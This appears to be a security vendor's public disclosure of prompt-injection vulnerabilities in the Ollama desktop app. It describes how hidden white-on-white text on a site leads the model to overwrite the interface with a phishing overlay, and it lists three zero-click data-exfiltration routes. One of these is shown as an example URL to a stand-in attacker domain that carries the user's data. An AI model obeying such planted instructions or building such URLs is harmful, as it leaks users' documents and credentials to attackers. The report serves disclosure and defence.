Threat Intelligence
Table of Content
Ollama’s desktop app is vulnerable to phishing overlay and data exfiltration attacks via indirect prompt injection, overwriting the app with an attacker’s site.
Context Ollama is a leading tool for leveraging AI models, with over 170,000 stars on GitHub. Multiple vulnerabilities in the desktop app have been identified, enabling phishing and data exfiltration attacks.
The entire Ollama desktop interface can be overwritten by an attacker-controlled website via an indirect prompt-injection attack due to insecure rendering of model outputs.
Three zero-click data exfiltration vectors exploitable via indirect prompt injection were also identified.
Note: No human-in-the-loop approval steps are required for any attacks in this article.
These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly.
The Attack Chain The user asks Ollama about an external website or externally-sourced fileA prompt injection is hidden on the external site in 1 pt font white-on-white text
The AI model is manipulated to output malicious HTML, overwriting the user interface with an attacker-controlled websiteThe AI model is manipulated to believe it must output an HTML element as part of its explanation to the user.
Note: Quitting and re-opening Ollama does not close the malicious overlay.The attacker logs the credentials entered into the malicious overlay
Data Exfiltration Attacks In addition to the phishing risk noted above, three zero-click data exfiltration vectors that are exploitable via indirect prompt injection were identified.
Data exfiltration via insecure web search tooling
Data exfiltration via insecure rendering of Markdown image outputs
Data exfiltration via insecure rendering of external HTML elements
Below is a data exfiltration attack chain that weaponizes insecure web search tooling:
Note: This attack uses the same malicious website, but with a different prompt injection.
A data source with a prompt injection is ingested (website, document, etc.)AI is manipulated to access a malicious URL, exfiltrating data from documents the user has been working withThe model is manipulated to construct a URL using the attacker’s domain, with data from the victim’s previously uploaded documents stored in query parameters.
attacker.com/?data={AI puts the user’s data here}The attacker’s server logs the model’s request, including the victim’s data
Responsible Disclosure These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly.
Timeline Dec 18, 2025 PromptArmor discloses to Ollama
Jan 20, 2026 PromptArmor follows up
Jan 26, 2026 PromptArmor follows up
Jan 29, 2026 PromptArmor follows up
Feb 19, 2026 PromptArmor follows up
May 28, 2026 Article published